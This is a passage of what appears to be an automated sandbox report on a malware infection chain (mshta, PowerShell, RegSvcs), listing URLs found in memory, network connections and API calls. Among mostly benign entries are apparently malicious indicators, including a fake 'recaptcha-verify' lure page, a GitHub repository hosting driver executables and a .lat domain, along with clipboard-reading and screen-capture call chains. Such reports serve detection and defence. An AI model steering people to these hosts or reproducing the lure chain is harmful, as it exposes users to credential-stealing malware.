                  Source: RegSvcs.exe, 0000000C.00000002.59494604546.0000000000CE0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
                  Source: RegSvcs.exe, 0000000C.00000002.59494604546.0000000000D3A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
                  Source: powershell.exe, 00000004.00000002.58302816703.0000015E93DC0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.58363019340.0000015EA2928000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.58310832394.0000025B98D06000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.58417681738.0000025BA7B39000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.58415482636.000001999007A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.58308550972.000001998150D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                  Source: powershell.exe, 00000004.00000002.58302816703.0000015E92ADA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.58310832394.0000025B97CEB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.58308550972.000001998022B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                  Source: powershell.exe, 00000004.00000002.58302816703.0000015E92ADA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.58310832394.0000025B97CEB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.58308550972.000001998022B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.pngXzi
                  Source: powershell.exe, 00000000.00000002.58258386449.000002A33820C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.58302816703.0000015E928B1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.58310832394.0000025B97AC1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.58308550972.0000019980001000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.58299585071.0000000002A91000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.59499668768.0000000002A1E000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.59499668768.0000000002EDD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                  Source: RegSvcs.exe, 0000000E.00000002.58326106471.0000000000A96000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://store.steampowered.com/account/cookiepreferences/
                  Source: RegSvcs.exe, 0000000E.00000002.58326106471.0000000000A96000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://store.steampowered.com/privacy_agreement/
                  Source: RegSvcs.exe, 0000000E.00000002.58326106471.0000000000A96000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://store.steampowered.com/subscriber_agreement/
                  Source: powershell.exe, 00000004.00000002.58302816703.0000015E92ADA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.58310832394.0000025B97CEB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.58308550972.000001998022B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                  Source: powershell.exe, 00000004.00000002.58302816703.0000015E92ADA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.58310832394.0000025B97CEB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.58308550972.000001998022B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.htmlXzi
                  Source: powershell.exe, 00000006.00000002.58452952666.0000025BB021E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.$D
                  Source: powershell.exe, 00000006.00000002.58452952666.0000025BB021E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.cZD
                  Source: mshta.exe, 00000003.00000003.58280651620.00000248D996B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.58297265094.00000250DC56D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.58278705202.00000250DCD85000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.58283273648.00000250DC6AC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.protware.com
                  Source: mshta.exe, 00000003.00000003.58276554563.00000250DCD93000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.58275820747.00000250DCD85000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.58307053628.00000250DCD96000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.58283494904.00000250DCD95000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.58278705202.00000250DCD85000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.protware.com/
                  Source: mshta.exe, 00000003.00000003.58276554563.00000250DCD93000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.58275820747.00000250DCD85000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.58307053628.00000250DCD96000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.58283494904.00000250DCD95000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.58278705202.00000250DCD85000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.protware.com/7
                  Source: powershell.exe, 00000000.00000002.58260917690.000002A3501FD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.58287043720.00000250DC675000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.58305312624.00000250DC675000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.58283273648.00000250DC673000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.58382068499.0000015EAAC2F000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.58448102834.0000025BAFE64000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.58457730531.00000199FF448000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.59532094818.00000000053E0000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000E.00000002.58328591615.0000000000AB8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.quovadis.bm0
                  Source: powershell.exe, 00000000.00000002.58258386449.000002A3381BA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6
                  Source: powershell.exe, 00000000.00000002.58258386449.000002A3381E5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.58302816703.0000015E928B1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.58310832394.0000025B97AC1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.58308550972.0000019980001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
                  Source: RegSvcs.exe, 0000000E.00000002.58328591615.0000000000AB8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.steampowered.com/
                  Source: RegSvcs.exe, 0000000E.00000002.58328295441.0000000000AA6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://broadcast.st.dl.eccdnx.com
                  Source: RegSvcs.exe, 0000000E.00000002.58328295441.0000000000AA6000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000E.00000002.58328591615.0000000000AB8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.cloudflare.steamstatic.com/steamcommunity/public/assets/
                  Source: RegSvcs.exe, 0000000E.00000002.58328295441.0000000000AA6000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000E.00000002.58328591615.0000000000AB8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://checkout.steampowered.com/
                  Source: RegSvcs.exe, 0000000E.00000002.58328591615.0000000000AB8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.cloudflare.steamstatic.com/
                  Source: RegSvcs.exe, 0000000E.00000002.58326106471.0000000000A96000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.cloudflare.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1
                  Source: powershell.exe, 00000008.00000002.58308550972.000001998150D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                  Source: powershell.exe, 00000008.00000002.58308550972.000001998150D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                  Source: powershell.exe, 00000008.00000002.58308550972.000001998150D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                  Source: RegSvcs.exe, 0000000C.00000002.59499668768.0000000002A1E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/DFfe9ewf/test3/raw/refs/heads/main/WebDriver.dll
                  Source: RegSvcs.exe, 0000000C.00000002.59499668768.0000000002A1E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/DFfe9ewf/test3/raw/refs/heads/main/chromedriver.exe
                  Source: RegSvcs.exe, 0000000C.00000002.59499668768.0000000002A1E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/DFfe9ewf/test3/raw/refs/heads/main/msedgedriver.exe
                  Source: powershell.exe, 00000004.00000002.58302816703.0000015E92ADA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.58310832394.0000025B97CEB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.58308550972.000001998022B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                  Source: powershell.exe, 00000004.00000002.58302816703.0000015E92ADA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.58310832394.0000025B97CEB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.58308550972.000001998022B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/PesterXzi
                  Source: powershell.exe, 00000004.00000002.58302816703.0000015E93773000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.58310832394.0000025B98306000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.58308550972.0000019981142000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
                  Source: powershell.exe, 00000006.00000002.58448102834.0000025BAFE9C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://go.microsoft.co
                  Source: RegSvcs.exe, 0000000E.00000002.58328295441.0000000000AA6000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000E.00000002.58328591615.0000000000AB8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://help.steampowered.com/
                  Source: mshta.exe, 00000003.00000003.58280651620.00000248D9998000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.58287185983.00000248D99A3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.58302980909.00000248D99A4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com
                  Source: RegSvcs.exe, 0000000E.00000002.58328295441.0000000000AA6000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000E.00000002.58328591615.0000000000AB8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.steampowered.com/
                  Source: RegSvcs.exe, 0000000E.00000002.58328295441.0000000000AA6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lv.queniujq.cn
                  Source: RegSvcs.exe, 0000000E.00000002.58328295441.0000000000AA6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://medal.tv
                  Source: powershell.exe, 00000004.00000002.58302816703.0000015E93DC0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.58363019340.0000015EA2928000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.58310832394.0000025B98D06000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.58417681738.0000025BA7B39000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.58415482636.000001999007A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.58308550972.000001998150D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                  Source: powershell.exe, 00000000.00000002.58260917690.000002A3501FD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.58287043720.00000250DC675000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.58305312624.00000250DC675000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.58283273648.00000250DC673000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.58382068499.0000015EAAC2F000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.58448102834.0000025BAFE64000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.58457730531.00000199FF448000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.59532094818.00000000053E0000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000E.00000002.58328591615.0000000000AB8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ocsp.quovadisoffshore.com0
                  Source: RegSvcs.exe, 0000000E.00000002.58328295441.0000000000AA6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://player.vimeo.com
                  Source: RegSvcs.exe, 0000000E.00000002.58328295441.0000000000AA6000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000E.00000002.58328591615.0000000000AB8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://recaptcha.net
                  Source: RegSvcs.exe, 0000000E.00000002.58328295441.0000000000AA6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://recaptcha.net/recaptcha/;
                  Source: RegSvcs.exe, 0000000E.00000002.58328295441.0000000000AA6000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000E.00000002.58328591615.0000000000AB8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://s.ytimg.com;
                  Source: RegSvcs.exe, 0000000E.00000002.58328295441.0000000000AA6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sketchfab.com
                  Source: RegSvcs.exe, 0000000C.00000002.59499668768.0000000002A1E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/11564914/23354;
                  Source: RegSvcs.exe, 0000000C.00000002.59499668768.0000000002A1E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/14436606/23354
                  Source: RegSvcs.exe, 0000000C.00000002.59499668768.0000000002A1E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/2152978/23354rCannot
                  Source: RegSvcs.exe, 0000000E.00000002.58328295441.0000000000AA6000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000E.00000002.58328591615.0000000000AB8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steam.tv/
                  Source: RegSvcs.exe, 0000000E.00000002.58328295441.0000000000AA6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steambroadcast-test.akamaized.net
                  Source: RegSvcs.exe, 0000000E.00000002.58328295441.0000000000AA6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steambroadcast.akamaized.net
                  Source: RegSvcs.exe, 0000000E.00000002.58328295441.0000000000AA6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steambroadcastchat.akamaized.net
                  Source: RegSvcs.exe, 0000000E.00000002.58326106471.0000000000A96000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com
                  Source: RegSvcs.exe, 0000000E.00000002.58328591615.0000000000AB8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/
                  Source: RegSvcs.exe, 0000000E.00000002.58328591615.0000000000AB8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/(
                  Source: RegSvcs.exe, 0000000E.00000002.58326106471.0000000000A96000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org
                  Source: RegSvcs.exe, 0000000E.00000002.58326106471.0000000000A63000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199724331900
                  Source: RegSvcs.exe, 0000000E.00000002.58328295441.0000000000AA6000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000E.00000002.58328591615.0000000000AB8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/
                  Source: RegSvcs.exe, 0000000E.00000002.58328295441.0000000000AA6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/;
                  Source: RegSvcs.exe, 0000000E.00000002.58328295441.0000000000AA6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/;Persistent-AuthWWW-AuthenticateVarysteamCountry=US%7C5914350094a33e2
                  Source: RegSvcs.exe, 0000000E.00000002.58326106471.0000000000A96000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/legal/
                  Source: mshta.exe, 00000003.00000002.58302794613.00000248D996B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.58280651620.00000248D996B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://view-res/recaptcha-verify.html
                  Source: mshta.exe, 00000003.00000003.58280651620.00000248D9998000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.58287185983.00000248D99A3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.58302980909.00000248D99A4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://view-reserve.com/
                  Source: mshta.exe, 00000003.00000003.58287597229.00000248D9924000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.58283273648.00000250DC6AC000.00000004.00000020.00020000.00000000.sdmp, 00.ps1String found in binary or memory: https://view-reserve.com/recaptcha-verify.html
                  Source: mshta.exe, 00000003.00000002.58305312624.00000250DC6AC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.58287043720.00000250DC6AC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.58283273648.00000250DC6AC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://view-reserve.com/recaptcha-verify.html...
                  Source: mshta.exe, 00000003.00000002.58302581442.00000248D98F0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://view-reserve.com/recaptcha-verify.html=
                  Source: mshta.exe, 00000003.00000002.58303252046.00000248D9AF0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://view-reserve.com/recaptcha-verify.htmlAPPT
                  Source: mshta.exe, 00000003.00000002.58305312624.00000250DC660000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.58302581442.00000248D98F0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://view-reserve.com/recaptcha-verify.htmlC:
                  Source: mshta.exe, 00000003.00000002.58303534824.00000248DB3A0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://view-reserve.com/recaptcha-verify.htmlH
                  Source: mshta.exe, 00000003.00000002.58302794613.00000248D9936000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.58280651620.00000248D9933000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://view-reserve.com/recaptcha-verify.htmlINetCookies
                  Source: mshta.exe, 00000003.00000002.58307882392.00000250E1340000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://view-reserve.com/recaptcha-verify.htmlJ
                  Source: mshta.exe, 00000003.00000002.58302661231.00000248D9925000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.58287597229.00000248D9924000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://view-reserve.com/recaptcha-verify.htmlTe
                  Source: mshta.exe, 00000003.00000003.58289321335.00000250DC78D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://view-reserve.com/recaptcha-verify.htmlYehItOKPCrVOrOVMGXyZZbKtNyrVXuwla
                  Source: mshta.exe, 00000003.00000002.58302794613.00000248D9936000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.58280651620.00000248D9933000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://view-reserve.com/recaptcha-verify.htmlYp?6
                  Source: mshta.exe, 00000003.00000002.58302661231.00000248D9925000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.58287597229.00000248D9924000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://view-reserve.com/recaptcha-verify.htmlZe
                  Source: mshta.exe, 00000003.00000002.58302661231.00000248D9925000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.58287597229.00000248D9924000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://view-reserve.com/recaptcha-verify.htmlbej6
                  Source: mshta.exe, 00000003.00000003.58288335780.00000250DC785000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://view-reserve.com/recaptcha-verify.htmlhttps://view-reserve.com/recaptcha-verify.html
                  Source: mshta.exe, 00000003.00000002.58302661231.00000248D9925000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.58287597229.00000248D9924000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://view-reserve.com/recaptcha-verify.htmlkeq6
                  Source: mshta.exe, 00000003.00000002.58305312624.00000250DC6AC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.58287043720.00000250DC6AC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.58283273648.00000250DC6AC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://view-reserve.com/recaptcha-verify.htmllLMEM
                  Source: mshta.exe, 00000003.00000002.58307053628.00000250DCD96000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.58283494904.00000250DCD95000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.58278705202.00000250DCD85000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://view-reserve.com/recaptcha-verify.htmlll
                  Source: mshta.exe, 00000003.00000002.58302581442.00000248D98F0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://view-reserve.com/recaptcha-verify.htmlu
                  Source: RegSvcs.exe, 0000000E.00000002.58326106471.0000000000A8B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://washyceehsu.lat/
                  Source: RegSvcs.exe, 0000000E.00000002.58328295441.0000000000AA6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com
                  Source: RegSvcs.exe, 0000000E.00000002.58328295441.0000000000AA6000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000E.00000002.58328591615.0000000000AB8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/recaptcha/
                  Source: RegSvcs.exe, 0000000E.00000002.58328295441.0000000000AA6000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000E.00000002.58328591615.0000000000AB8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.cn/recaptcha/
                  Source: RegSvcs.exe, 0000000E.00000002.58328295441.0000000000AA6000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000E.00000002.58328591615.0000000000AB8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com/recaptcha/
                  Source: RegSvcs.exe, 0000000E.00000002.58328295441.0000000000AA6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com
                  Source: RegSvcs.exe, 0000000E.00000002.58328295441.0000000000AA6000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000E.00000002.58328591615.0000000000AB8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49773
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49769 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49773 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49769
                  Source: unknownHTTPS traffic detected: 92.255.57.120:443 -> 192.168.11.20:49769 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 23.47.27.74:443 -> 192.168.11.20:49773 version: TLS 1.2
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_004363E0 OpenClipboard,GetClipboardData,GlobalLock,GetWindowLongW,GlobalUnlock,CloseClipboard,14_2_004363E0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_004363E0 OpenClipboard,GetClipboardData,GlobalLock,GetWindowLongW,GlobalUnlock,CloseClipboard,14_2_004363E0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_00436590 GetDC,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetCurrentObject,GetObjectW,DeleteObject,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,SelectObject,DeleteDC,ReleaseDC,DeleteObject,14_2_00436590
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 11_2_00D20EE0 NtSetValueKey,11_2_00D20EE0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 11_2_00D20ED8 NtSetValueKey,11_2_00D20ED8
                  Source: C:\Windows\System32\mshta.exeCode function: 3_3_00000250DC912F143_3_00000250DC912F14
                  Source: C:\Windows\System32\mshta.exeCode function: 3_3_00000250DC912F143_3_00000250DC912F14
                  Source: C:\Windows\System32\mshta.exeCode function: 3_3_00000250DC912F143_3_00000250DC912F14
                  Source: C:\Windows\System32\mshta.exeCode function: 3_3_00000250DC912F143_3_00000250DC912F14
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FFB4C8685394_2_00007FFB4C868539
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FFB4C866EC04_2_00007FFB4C866EC0
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FFB4C8668004_2_00007FFB4C866800
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_00007FFB4C8885396_2_00007FFB4C888539
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_00007FFB4C8868006_2_00007FFB4C886800
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00007FFB4C8585398_2_00007FFB4C858539
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00007FFB4C8568008_2_00007FFB4C856800
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 12_2_0651237F12_2_0651237F
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 12_2_065169C812_2_065169C8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 12_2_0651245412_2_06512454
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 12_2_0651238812_2_06512388
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 12_2_06511E3712_2_06511E37
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 12_2_06511E2E12_2_06511E2E
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 12_2_06511F2512_2_06511F25
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 12_2_0651004012_2_06510040
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 12_2_0651000612_2_06510006
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0040874014_2_00408740
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_00440A0D14_2_00440A0D
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0040AE6014_2_0040AE60
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0043005014_2_00430050
